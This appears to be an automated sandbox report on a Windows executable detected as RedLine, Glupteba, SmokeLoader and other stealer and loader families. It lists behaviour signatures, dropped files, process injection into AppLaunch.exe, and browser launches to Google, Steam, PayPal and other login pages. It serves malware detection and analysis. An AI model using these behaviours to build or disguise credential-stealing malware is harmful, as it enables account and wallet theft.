Analysis Overview
SHA256
77cb45093ccf067140c55c5c8b7df6c7ce6e77abda5f7b55e1c0da15fcdb4cc2
Threat Level: Known bad
The file f3935b22955ae50d6117ba87916058d9.exe was found to be: Known bad.
Malicious Activity Summary
Mystic
Glupteba payload
ZGRat
Detect Mystic stealer payload
RedLine
SmokeLoader
SectopRAT payload
RedLine payload
SectopRAT
Detect ZGRat V1
Glupteba
Modifies Windows Firewall
Downloads MZ/PE file
Stops running service(s)
Executes dropped EXE
Reads user/profile data of web browsers
Checks computer location settings
Adds Run key to start application
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Detected potential entity reuse from brand paypal.
Suspicious use of SetThreadContext
AutoIT Executable
Launches sc.exe
Unsigned PE
Program crash
Enumerates physical storage devices
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-11 10:21
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-11 10:21
Reported
2023-11-11 10:23
Platform
win10v2004-20231023-en
Max time kernel
88s
Max time network
158s
Command Line
Signatures
Detect Mystic stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Mystic
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2231940048-779848787-2990559741-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1786.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\qG0Ky75.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oa9gW24.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zM6Oz18.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1jJ16qx0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2LX2769.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Cm46eE.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8nW268RB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9Bx9pp4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1786.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1881.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\f3935b22955ae50d6117ba87916058d9.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\qG0Ky75.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oa9gW24.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zM6Oz18.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected potential entity reuse from brand paypal.
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 6256 set thread context of 3312 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2LX2769.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 4668 set thread context of 540 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8nW268RB.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 220 set thread context of 6824 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9Bx9pp4.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Cm46eE.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Cm46eE.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Cm46eE.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Cm46eE.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Cm46eE.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Cm46eE.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1881.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1786.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\f3935b22955ae50d6117ba87916058d9.exe
"C:\Users\Admin\AppData\Local\Temp\f3935b22955ae50d6117ba87916058d9.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\qG0Ky75.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\qG0Ky75.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oa9gW24.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oa9gW24.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zM6Oz18.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zM6Oz18.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1jJ16qx0.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1jJ16qx0.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffb7f5746f8,0x7ffb7f574708,0x7ffb7f574718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffb7f5746f8,0x7ffb7f574708,0x7ffb7f574718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb7f5746f8,0x7ffb7f574708,0x7ffb7f574718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x17c,0x180,0x184,0x158,0x188,0x7ffb7f5746f8,0x7ffb7f574708,0x7ffb7f574718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb7f5746f8,0x7ffb7f574708,0x7ffb7f574718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb7f5746f8,0x7ffb7f574708,0x7ffb7f574718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb7f5746f8,0x7ffb7f574708,0x7ffb7f574718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1856 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,12338958948200952820,10430467298514665167,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,12338958948200952820,10430467298514665167,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,6452844629624712538,1861870339206005634,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,6452844629624712538,1861870339206005634,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,13102855373617202948,989554031231894813,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x148,0x140,0x16c,0x144,0x170,0x7ffb7f5746f8,0x7ffb7f574708,0x7ffb7f574718
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,9217692194698886292,2039246455489852754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,10224151978398521687,5229354292536310649,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
